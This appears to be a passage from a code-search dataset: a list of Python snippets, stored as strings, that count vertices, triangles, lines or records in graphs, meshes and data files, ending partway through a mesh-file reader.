"def get_vertices_count(self) -> int:\n # TODO: verify the following claim:\n raise NotImplementedError", "def test_triangle_count_07(self):\n body = {\"direction\": \"OUT\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 0}\n else:\n assert 0", "def obtener_cantidad_vertices(self):\n return len(self.vertices.keys())", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def num_vertices(self):\n return len(self)", "def ss_triangle_count(graph: ScipyGraph) -> int:\n props = ScipyGraph.Type.compute_abstract_properties(graph, {\"edge_type\"})\n if props[\"edge_type\"] == \"map\":\n # Drop weights before performing triangle count\n m = graph.value.copy()\n m.data = np.ones_like(m.data)\n elif props[\"edge_type\"] == \"set\":\n m = graph.value\n L = ss.tril(m, k=-1).tocsr()\n U = ss.triu(m, 
k=1).tocsc()\n return int((L @ U.T).multiply(L).sum())", "def findTriangles(p):\n triangleCount = 0\n for a in range(3, p//3 + 1):\n for b in range(a+1, p//2):\n c = p - (a+b)\n if (a**2 + b**2) == c**2:\n triangleCount += 1\n return triangleCount", "def num_vertices(self):\n return self.n * (1 + int(self.variant.is_bipartite()))", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def load_data():\n data = []\n with euler.Resource('triangle.txt') as datafile:\n for line in datafile.readlines():\n data.insert(0, map(int, line.strip().split()))\n return data", "def num_vertices(self):\n return len(self.vertices)", "def num_vertices(self):\n return len(self.vertices)", "def return_num_vertices(self):\n return self.__size", "def n_vertices(self):\n try: \n return self._n_vertices\n except AttributeError:\n self._n_vertices = 0\n for v in self.vertex_generator(): self._n_vertices += 1\n return self._n_vertices", "def get_edge_lengths(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n edges, _ = get_edges(triangles)\n return np.linalg.norm(np.diff(points[edges], axis=1), axis=2).squeeze()", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def std_triangles_count(graph):\n if nx.is_directed(graph):\n raise Exception(\"Graph is not undirected\")\n\n return sum(nx.triangles(graph).values()) // 3", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def vertexCount(self):\n return self._nVertices", "def numverts(self):\n return self._numvertstotal", "def getNumVertices(self):\n return len(self.V)", "def num_vertices(self, p):\n ret_val = self._num_vertices(p)\n return ret_val", "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def get_triangle_count(remote, objectid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleCount(objectid)\n remote.runCommand(cmd1)\n result_val = 
mmapi.any_result()\n cmd1.GetSceneCommandResult_GetTriangleCount(key1, result_val)\n return result_val.i", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def test_number_of_vertex_elements_in_MESH_chunk(self):\n for O in self.mod.objts.itervalues():\n for M in O.meshes.itervalues():\n self.assertEqual(M.vsize, len(M.vert))", "def num_vertices(self):\r\n return len(self.__graph_dict.keys())", "def countgenes():\n directory = openfile('db_directory.txt')\n no_genes_file = directory+'GENES_IN_HPO.txt'\n GENES_IN_HPO = openfile(no_genes_file)\n #GENES_IN_HPO = openfile(numbergenes_file)\n return int(GENES_IN_HPO)", "def num_vertices(self):\n return self._top_exp.number_of_vertices()", "def n_vertices(self):\n return len(self.minimized_generators())", "def read_off_size(path):\n try:\n with open(path, 'r') as file:\n lines = file.readlines()\n if lines[0] != 'OFF\\n':\n print(path, 'Error: is not an .off file')\n num_vertices, num_faces = tuple(lines[1].split()[:2])\n return int(num_vertices), int(num_faces)\n except IOError:\n print('Error: Failed reading file:', path)", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def get_vertex_data(\n mesh: object,\n g: BinaryReader,\n v1: int,\n v2: int,\n v3: int,\n v4: int,\n n: int,\n verbose=False,\n):\n for i in range(v1):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v1 v_offset\": v_offset,\n \"v1 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n mesh.skinWeightList.append([0, 0, 0, 1])\n\n for i in range(v2):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v2 v_offset\": v_offset,\n \"v2 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = 1.0 - w1\n mesh.skinWeightList.append([0, 0, w2, w1])\n\n for i in range(v3):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v3 v_offset\": v_offset,\n \"v3 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = 1.0 - w1 - w2\n mesh.skinWeightList.append([0, w3, w2, w1])\n\n for i in range(v4):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v4 v_offset\": v_offset,\n \"v4 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = g.f(1)[0]\n w4 = 1.0 - w1 - w2 - w3\n mesh.skinWeightList.append([w4, w3, w2, w1])", "def vertex_count(self) -> int:\n return len(self._vertex_map)", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def read_triangle(f, layers=1):\n # Read nodes\n with open(f + '.node') as h:\n 
num_nodes = int(h.readline().split(' ')[0])\n node_values = np.zeros((num_nodes, 2), dtype=np.float64)\n for line in h:\n if line[0] == '#':\n continue\n node, x, y = line.split()[:3]\n node_values[int(node) - 1, :] = [float(x), float(y)]\n\n nodes = op2.Set(num_nodes, \"nodes\")\n coords = op2.Dat(nodes ** 2, node_values, name=\"coords\")\n\n # Read elements\n with open(f + '.ele') as h:\n num_tri, nodes_per_tri, num_attrs = [int(x) for x in h.readline().split()]\n map_values = np.zeros((num_tri, nodes_per_tri), dtype=np.int32)\n for line in h:\n if line[0] == '#':\n continue\n vals = [int(x) - 1 for x in line.split()]\n map_values[vals[0], :] = vals[1:nodes_per_tri + 1]\n\n elements = op2.Set(num_tri, \"elements\", layers=layers)\n elem_node = op2.Map(elements, nodes, nodes_per_tri, map_values, \"elem_node\")\n\n return nodes, coords, elements, elem_node", "def bpCount(file):\n amount_bp = len(file)\n return amount_bp", "def size(self):\n num_vert = 0\n num_edg = 0\n for vertex in self.vertices():\n num_vert += 1\n num_edg += len(self.neighbors(vertex))\n return (num_vert, num_edg)", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def number_of_trips(filename): \r\n \r\n with open(filename, 'r') as f_in:\r\n # set up csv reader object\r\n trip_reader = csv.DictReader(f_in)\r\n \r\n # initialize count variables\r\n n_subscribers = 0\r\n n_customers = 0\r\n \r\n # tally up ride types\r\n for row in trip_reader:\r\n if row['user_type'] == 'Subscriber':\r\n n_subscribers += 1\r\n else:\r\n n_customers += 1\r\n \r\n # compute total number of rides\r\n n_total = n_subscribers + n_customers\r\n \r\n # return tallies as a tuple\r\n return(n_subscribers, n_customers, n_total)", "def file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n Nrows = i + 1\n return Nrows", "def n_n(output_path):\n lef = {}\n rig = {}\n rellef = {}\n relrig = {}\n\n triple = open(Path(output_path, \"train2id.txt\"), \"r\")\n valid = open(Path(output_path, \"valid2id.txt\"), \"r\")\n test = open(Path(output_path, \"test2id.txt\"), \"r\")\n\n ls = triple.readlines()\n tot = len(ls) - 1\n\n # (int)(triple.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = triple.readline()\n h, t, r = content.strip().split()\n if not (h, r) in lef:\n lef[(h, r)] = []\n if not (r, t) in rig:\n rig[(r, t)] = []\n lef[(h, r)].append(t)\n rig[(r, t)].append(h)\n if not r in rellef:\n rellef[r] = {}\n if not r in relrig:\n relrig[r] = {}\n rellef[r][h] = 1\n relrig[r][t] = 1\n\n ls = valid.readlines()\n tot = len(ls) - 1\n # (int)(valid.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = valid.readline()\n h, t, r = content.strip().split()\n if not (h, r) in lef:\n lef[(h, r)] = []\n if not (r, t) in rig:\n rig[(r, t)] = []\n lef[(h, r)].append(t)\n rig[(r, t)].append(h)\n if not r in rellef:\n rellef[r] = {}\n if not r in relrig:\n relrig[r] = {}\n rellef[r][h] = 1\n relrig[r][t] = 1\n\n ls = test.readlines()\n tot = len(ls) - 1\n # (int)(test.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = test.readline()\n h, t, r = content.strip().split()\n if not (h, r) in lef:\n lef[(h, r)] = []\n if not (r, t) in rig:\n rig[(r, t)] = []\n lef[(h, r)].append(t)\n rig[(r, t)].append(h)\n if not r in rellef:\n rellef[r] = {}\n if not r in relrig:\n relrig[r] = {}\n rellef[r][h] = 1\n relrig[r][t] = 1\n\n test.close()\n valid.close()\n triple.close()\n\n f = open(Path(output_path, 
\"type_constrain.txt\"), \"w\")\n f.write(\"%d\\n\" % (len(rellef)))\n for i in rellef:\n f.write(\"%s\\t%d\" % (i, len(rellef[i])))\n for j in rellef[i]:\n f.write(\"\\t%s\" % (j))\n f.write(\"\\n\")\n f.write(\"%s\\t%d\" % (i, len(relrig[i])))\n for j in relrig[i]:\n f.write(\"\\t%s\" % (j))\n f.write(\"\\n\")\n f.close()\n\n rellef = {}\n totlef = {}\n relrig = {}\n totrig = {}\n\n for i in lef:\n if not i[1] in rellef:\n rellef[i[1]] = 0\n totlef[i[1]] = 0\n rellef[i[1]] += len(lef[i])\n totlef[i[1]] += 1.0\n\n for i in rig:\n if not i[0] in relrig:\n relrig[i[0]] = 0\n totrig[i[0]] = 0\n relrig[i[0]] += len(rig[i])\n totrig[i[0]] += 1.0\n\n s11 = 0\n s1n = 0\n sn1 = 0\n snn = 0\n f = open(Path(output_path, \"test2id.txt\"), \"r\")\n ls = f.readlines()\n tot = len(ls) - 1\n # tot = (int)(f.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = f.readline()\n h, t, r = content.strip().split()\n rign = rellef[r] / totlef[r]\n lefn = relrig[r] / totrig[r]\n if rign <= 1.5 and lefn <= 1.5:\n s11 += 1\n if rign > 1.5 and lefn <= 1.5:\n s1n += 1\n if rign <= 1.5 and lefn > 1.5:\n sn1 += 1\n if rign > 1.5 and lefn > 1.5:\n snn += 1\n f.close()\n\n f = open(Path(output_path, \"test2id.txt\"), \"r\")\n f11 = open(Path(output_path, \"1-1.txt\"), \"w\")\n f1n = open(Path(output_path, \"1-n.txt\"), \"w\")\n fn1 = open(Path(output_path, \"n-1.txt\"), \"w\")\n fnn = open(Path(output_path, \"n-n.txt\"), \"w\")\n fall = open(Path(output_path,\"test2id_all.txt\"), \"w\")\n fall = open(Path(output_path,\"test2id_all.txt\"), \"w\")\n\n ls = f.readlines()\n tot = len(ls) - 1\n\n # tot = (int)(f.readline())\n fall.write(\"%d\\n\" % (tot))\n f11.write(\"%d\\n\" % (s11))\n f1n.write(\"%d\\n\" % (s1n))\n fn1.write(\"%d\\n\" % (sn1))\n fnn.write(\"%d\\n\" % (snn))\n for i in range(tot):\n content = ls[i + 1]\n # content = f.readline()\n h, t, r = content.strip().split()\n rign = rellef[r] / totlef[r]\n lefn = relrig[r] / totrig[r]\n if rign <= 1.5 and lefn <= 1.5:\n f11.write(content)\n fall.write(\"0\" + \"\\t\" + content)\n if rign > 1.5 and lefn <= 1.5:\n f1n.write(content)\n fall.write(\"1\" + \"\\t\" + content)\n if rign <= 1.5 and lefn > 1.5:\n fn1.write(content)\n fall.write(\"2\" + \"\\t\" + content)\n if rign > 1.5 and lefn > 1.5:\n fnn.write(content)\n fall.write(\"3\" + \"\\t\" + content)\n fall.close()\n f.close()\n f11.close()\n f1n.close()\n fn1.close()\n fnn.close()", "def count_positions(fname):\r\n with open(fname) as f:\r\n for i, l in enumerate(f):\r\n pass\r\n return i + 1", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def read_input(filename):\n with open(filename, 'r') as f:\n (N) = map(int, next(f).split())\n def parse_line(line):\n l = line.split()\n h = 0 if l[0] == 'H' else 1\n n = int(l[1])\n return [h, l[2:]]\n\n photos = transform_strings([parse_line(line) for line in f])\n return (len(photos), photos)", "def getNumVertexes(self):\n return _osgAnimation.RigTransformHardware_getNumVertexes(self)", "def __len__(self):\n return len(self._vertices)", "def getFileCount(self) -> int:\n ...", "def parse_triangle_files(self):\n nodes = {}\n boundary_nodes = []\n\n # parse node file into nodes\n with open(self.files['node']) as node_file:\n header = True\n for line in node_file:\n if header:\n header = False\n continue\n content = list(filter(lambda a: bool(a), line.split(' '))) # pylint: 
disable=W0108\n if not '#' in content[0]:\n is_boundary = content[3] == '1\\n'\n nodes[int(content[0])] = {\n 'id': int(content[0]),\n 'coords': [int(content[1]), int(content[2])],\n 'distance': 0 if is_boundary else None,\n 'relations': [],\n 'level_cycles': [], # ids of any level cycles this node is a part of\n 'level_paths': [], # ids of any level paths this node is a part of\n 'is_root_element': False,\n 'betweener_paths': []\n }\n if is_boundary:\n boundary_nodes.append(int(content[0]))\n node_file.close()\n\n # parse edge files into node relations\n with open(self.files['edge']) as edge_file:\n header = True\n for line in edge_file:\n if header:\n header = False\n continue\n content = list(filter(bool, line.split(' ')))\n if not '#' in content[0]:\n nodes[int(content[1])]['relations'].append(int(content[2]))\n nodes[int(content[2])]['relations'].append(int(content[1]))\n edge_file.close()\n\n # with open(self.files['ele']) as ele_file:\n # header = True\n # for line in edge_file:\n # if header:\n # header = False\n # continue\n # content = list(filter(bool, line.split(' ')))\n # if not '#' in content[0]:\n # nodes[int(content[1])]['relations'].append(int(content[2]))\n # nodes[int(content[2])]['relations'].append(int(content[1]))\n # edge_file.close()\n\n # sorts relations clockwise\n for node_id, node in nodes.items():\n nodes[node_id]['relations'] = sorted(node['relations'], key=(\n lambda related_node_id: (\n self.calculate_clockwise_angle_and_distance(node, nodes.get(related_node_id)) # pylint: disable=W0640\n )\n ))\n\n levels = self.get_levels(nodes, boundary_nodes)\n\n for level in levels:\n for node_id in level['node_ids']:\n self.identify_special_nodes(nodes, node_id)\n\n return nodes, boundary_nodes, levels", "def line_count(file):\n with open(file, \"r\") as f:\n return sum(1 for line in f)", "def get_num_examples(path_in):\n i = 0\n with open(path_in, 'r', encoding='utf8') as f:\n for _ in f:\n i += 1\n return i", "def read_test_tuples():\n lines = read_input(25, True)\n point_sets = list(parse_points(lines))\n expected_counts = [4, 3, 8]\n\n return zip(point_sets, expected_counts)", "def fileCount(self):\n pass", "def loadVTKPolydataFile(infile):\n\n lines = None\n\n with open(infile, 'rt') as f:\n lines = f.readlines()\n\n lines = [l.strip() for l in lines]\n\n if lines[3] != 'DATASET POLYDATA':\n raise ValueError('Only the POLYDATA data type is supported')\n\n nVertices = int(lines[4].split()[1])\n nPolygons = int(lines[5 + nVertices].split()[1])\n nIndices = int(lines[5 + nVertices].split()[2]) - nPolygons\n\n vertices = np.zeros((nVertices, 3), dtype=np.float32)\n polygonLengths = np.zeros( nPolygons, dtype=np.uint32)\n indices = np.zeros( nIndices, dtype=np.uint32)\n\n for i in range(nVertices):\n vertLine = lines[i + 5]\n vertices[i, :] = [float(w) for w in vertLine.split()]\n\n indexOffset = 0\n for i in range(nPolygons):\n\n polyLine = lines[6 + nVertices + i].split()\n polygonLengths[i] = int(polyLine[0])\n\n start = indexOffset\n end = indexOffset + polygonLengths[i]\n indices[start:end] = [int(w) for w in polyLine[1:]]\n\n indexOffset += polygonLengths[i]\n\n return vertices, polygonLengths, indices", "def readGR3File(inputFilename):\n print 'Reading ' + inputFilename + ' ...'\n infile = open(inputFilename, 'r')\n description = infile.readline().strip() # remove leading/trailing whitespace\n tmpStr = infile.readline()\n nTriangles, nNodes = (int(s) for s in tmpStr.split())\n print ' nTriangles={0:d} nNodes={1:d}'.format(nTriangles, nNodes)\n\n # nodes\n 
nodeArray = readNodeBlock(infile, nNodes)\n nodenum = np.array(nodeArray[:, 0].flatten(), dtype=int)\n nodexyz = np.zeros((nNodes, 3))\n nodexyz[:, :2] = nodeArray[:, 1:3]\n nodalValues = nodeArray[:, 3]\n\n print ' Nodal values min={0:g} max={1:g}'.format(min(nodalValues), max(nodalValues))\n\n # triangular elements\n triArray = readElemBlock(infile, nTriangles)\n\n trinum = triArray[:, 0].flatten()\n tritype = triArray[0, 1]\n trinodes = triArray[:, -3:] - 1 # three last columns, 0-based indexing\n #triangles = meshElements(trinodes,trinum,tritype)\n\n x = nodexyz[:, 0]\n y = nodexyz[:, 1]\n\n tmpStr = infile.readline()\n boundaries = []\n if len(tmpStr) > 0:\n # boundary information, if not end of file\n nOpenBndSegments = int(tmpStr.split()[0])\n nOpenBndNodesTot = int(infile.readline().split()[0])\n print ' nOpenBndSegments={0:d} nOpenBndNodesTot={1:d}'.format(nOpenBndSegments, nOpenBndNodesTot)\n for iBnd in range(nOpenBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n tag = bndHeader[-1]\n if tag.isdigit():\n tag = 'open' + tag\n print ' open bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary('open', tag, nodes))\n nLandBndSegments = int(infile.readline().split()[0])\n nLandBndNodesTot = int(infile.readline().split()[0])\n landBndTags = range(\n nOpenBndSegments + 1,\n nOpenBndSegments + nLandBndSegments + 1)\n print ' nLandBndSegments={0:d} nLandBndNodesTot={1:d}'.format(nLandBndSegments, nLandBndNodesTot)\n for iBnd in range(nLandBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n try:\n landType = int(bndHeader[1])\n except:\n print \"\"\"Land boundary type missing in gr3 file. 
Add 0/1 (land/island) after number of nodes in each land boudary, e.g.\n 1002 = Total number of closed boundary nodes\n 501 0 = Number of nodes in closed boundary 1\"\"\"\n raise Exception(\n 'Could not parse land boundary type (0/1 - land/island)\\n')\n landType = 'island' if landType == 1 else 'land'\n tag = landType + bndHeader[-1]\n print ' land bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n #tmpList = fromfile(infile,dtype=int,count=nBndNodes,sep=' ')\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary(landType, tag, nodes))\n\n infile.close()\n\n # for better interpolation, round coordinates to 1e-4\n nDig = 4\n x = np.round(x, nDig)\n y = np.round(y, nDig)\n\n return x, y, nodalValues, trinodes, boundaries, description", "def count_data_items(fileids, train=True):\n sizes = 28000 if train else 22500\n return len(fileids) * sizes", "def linesCountingAux(file_name, nProcesses):\r\n\r\n linesPerProcessesList = []\r\n\r\n with open(file_name, \"r\") as file:\r\n lineCounting = 0\r\n\r\n for line in file:\r\n lineCounting += 1 #discover the lines in the text file\r\n\r\n linesPerProcesses = lineCounting // nProcesses\r\n\r\n for number in range(nProcesses):\r\n linesPerProcessesList.append(linesPerProcesses)\r\n if sum(linesPerProcessesList) < lineCounting:\r\n for number in range (lineCounting - sum(linesPerProcessesList)):\r\n linesPerProcessesList[number] += 1\r\n\r\n return linesPerProcessesList", "def data_edge_count(self) -> int:\n return int(self.graph_tuple_stats.data_edge_count or 0)", "def create_1d_coil_geometry(division, filename, directory):\n os.chdir(directory)\n npoints = division + 1\n length_array = np.zeros((npoints, 2))\n current_length = 0\n array = np.loadtxt(filename)\n for i in range(1, npoints):\n current_length += ((array[i, 1] - array[i - 1, 1]) ** 2 + (array[i, 2] - array[i - 1, 2]) ** 2 +\n (array[i, 3] - array[i - 1, 3]) ** 2) ** 0.5\n length_array[i - 1, 0] = i\n length_array[i, 1] = current_length\n length_array[npoints - 1, 0] = npoints\n return length_array", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def calc_side_lengths(triangles):\n first_vec = [2, 0, 1]\n second_vec = [1, 2, 0]\n sides = triangles[:, first_vec] - triangles[:, second_vec]\n lengths = np.sqrt(np.sum(sides**2, axis=2))\n return lengths", "def countLength():\n counter = 0\n\n with open('bc.processed3.csv', 'r') as openfile:\n for line in openfile:\n counter += 1\n if counter == 1:\n print line\n\n print('Length: ', counter)", "def pre_process_file(filename):\n\n num_lines = 0\n vm_ids = set()\n with open(filename) as trace:\n for item in csv.reader(trace, delimiter=','):\n num_lines += 1\n disk_id = int(item[2])\n vm_ids.add(disk_id) # can make it more efficient\n no_of_vms = len(vm_ids)\n return (num_lines, no_of_vms, vm_ids)", "def load_triangles(triangle_bytes, header):\n triangles = list()\n for i in range(header.num_tris):\n triangle = triangle_t(list(struct.unpack(\"<hhh\", triangle_bytes[12*i:12*i+6])), 
list(struct.unpack(\"<hhh\", triangle_bytes[12*i+6:12*i+12])))\n # print(triangle)\n triangles.append(triangle)\n return triangles", "def xFileInfo(filename):\n delim = getDelimiter(filename)\n f = open(filename, 'r')\n reader = csv.reader(f, delimiter=delim)\n num_rows = 0\n for (row_i, row) in enumerate(reader):\n if row_i == 0: #ignore empty strings (e.g. at end of row)\n num_cols = len([val for val in row if val])\n num_rows += 1\n f.close()\n return (num_rows, num_cols)", "def load_counts(filename, lengths=None, base=None):\n n = None\n if lengths is not None:\n n = lengths.sum()\n shape = (n, n)\n else:\n shape = None\n # This is the interaction count files\n dataframe = pd.read_csv(filename, sep=\"\\t\", comment=\"#\", header=None)\n row, col, data = dataframe.as_matrix().T\n\n # If there are NAs remove them\n mask = np.isnan(data)\n if np.any(mask):\n warnings.warn(\n \"NAs detected in %s. \"\n \"Removing NAs and replacing with 0.\" % filename)\n row = row[np.invert(mask)]\n col = col[np.invert(mask)]\n data = data[np.invert(mask)]\n\n # XXX We need to deal with the fact that we should not duplicate entries\n # for the diagonal.\n # XXX what if n doesn't exist?\n if base is not None:\n if base not in [0, 1]:\n raise ValueError(\"indices should start either at 0 or 1\")\n col -= base\n row -= base\n else:\n warnings.warn(\n \"Attempting to guess whether counts are 0 or 1 based\")\n\n if (col.min() >= 1 and row.min() >= 1) and \\\n ((n is None) or (col.max() == n)):\n # This is a hack to deal with the fact that sometimes, the files\n # are indexed at 1 and not 0\n\n col -= 1\n row -= 1\n\n if shape is None:\n n = max(col.max(), row.max()) + 1\n shape = (n, n)\n\n data = data.astype(float)\n counts = sparse.coo_matrix((data, (row, col)), shape=shape)\n return counts", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def get_dimensions ( file_in, separator ) :\n try :\n logger.info ( \"Extract dimensions from xyz file \" + str(file_in) ) \n d = {}\n first_row = True\n d[NOPS] = 0\n file = open(file_in, 'r')\n for line in file :\n d[NOPS] = d[NOPS] + 1\n l = line.rstrip().split(separator)\n x = float(l[0])\n y = float(l[1])\n z = float(l[2])\n if first_row :\n d[MINX] = x\n d[MAXX] = x\n d[MINY] = y\n d[MAXY] = y\n d[MINZ] = z\n d[MAXZ] = z\n first_row = False\n else :\n if x < d[MINX] :\n d[MINX] = x\n if x > d[MAXX] :\n d[MAXX] = x \n if y < d[MINY] :\n d[MINY] = y\n if y > d[MAXY] :\n d[MAXY] = y \n if z < d[MINZ] :\n d[MINZ] = z\n if z > d[MAXZ] :\n d[MAXZ] = z \n file.close() \n logger.info ('Now return')\n return d\n except Exception, err:\n logger.critical(\"Extract dimensions from xyz file failed: ERROR: %s\\n\" % str(err))\n raise", "def count_cop(self, infile):\n n_cop = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n if dg.has_cop_deprel():\n n_cop += 1\n return n_cop, len(dgs_in)", "def listRows(file):\n\twith open(file) as f:\n\t\tcount = 0\n\t\tfor line in f.readlines():\n\t\t\tcount += 1\n\t\treturn count -1", "def getVertexNumbers(self):\n return self.vertexIndex.keys()", "def reader(filename,only_length=False):\n print(\"Counting lines in file %s\"%filename)\n total_lines=0\n for n,line in enumerate(open(filename,\"r\")):\n total_lines+=1\n \n if only_length:\n return total_lines\n \n X,Y,Z,W,J=[np.zeros(total_lines) for _ in range(5)]\n \n for 
n, line in enumerate(open(filename, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d from file %s\" %(n,total_lines,filename))\n split_line=np.array(line.split(\" \"), dtype=float) \n X[n]=split_line[0];\n Y[n]=split_line[1];\n Z[n]=split_line[2];\n W[n]=split_line[3];\n J[n]=int(split_line[4]);\n return X,Y,Z,W,J", "def pfd_read (r) :\n s = r.readline()\n if s == \"\" :\n return False\n l = s.split()\n numVert = int(l[0])\n numRule = int(l[1])\n assert numVert > 0 and numVert <= 100\n assert numRule > 0 and numRule <= 100\n v = [[0,[]]] #build the Vertex array\n for i in range(1, numVert):\n temp = [0,[]]\n v.append(temp)\n s = r.readline()\n for i in range(0, numRule):\n if s == \"\":\n return False\n l = s.split()\n v[int(l[0])-1][0] = int(l[1]) #verts[l[0]].numPred = l[1]\n #verts[l[0]].preds = [0] * (len(l)-2) #I don't know whether this line is necessary\n lenl = len(l)\n for j in range(2,lenl):\n v[int(l[j])-1][1].append(int(l[0]))\n #verts[l[j]-1].succ.append(l[0]) \n s = r.readline()\n return v", "def part1(filename: str) -> int:\n data = first_line(filename)\n data = json.loads(data)\n return total_nums(data)", "def get_num_vertices(self):\n\n return self._graph_state.get_num_vertices()", "def get_dataset_size(file_path):\n size = 1\n file_list = tf.io.gfile.glob(file_path)\n for file in file_list:\n for record in tf.compat.v1.io.tf_record_iterator(file, options=tf.io.TFRecordOptions(\n compression_type='GZIP')):\n size += 1\n return size", "def from_polyfile(name):\n\n from anuga.utilities.numerical_tools import anglediff\n from math import pi\n import os.path\n root, ext = os.path.splitext(name)\n\n if ext == 'poly':\n filename = name\n else:\n filename = name + '.poly'\n\n\n fid = open(filename)\n\n points = [] #x, y\n values = [] #z\n ##vertex_values = [] #Repeated z\n triangles = [] #v0, v1, v2\n\n lines = fid.readlines()\n\n keyword = lines[0].strip()\n msg = 'First line in .poly file must contain the keyword: POINTS'\n assert keyword == 'POINTS', msg\n\n offending = 0\n i = 1\n while keyword == 'POINTS':\n line = lines[i].strip()\n i += 1\n\n if line == 'POLYS':\n keyword = line\n break\n\n fields 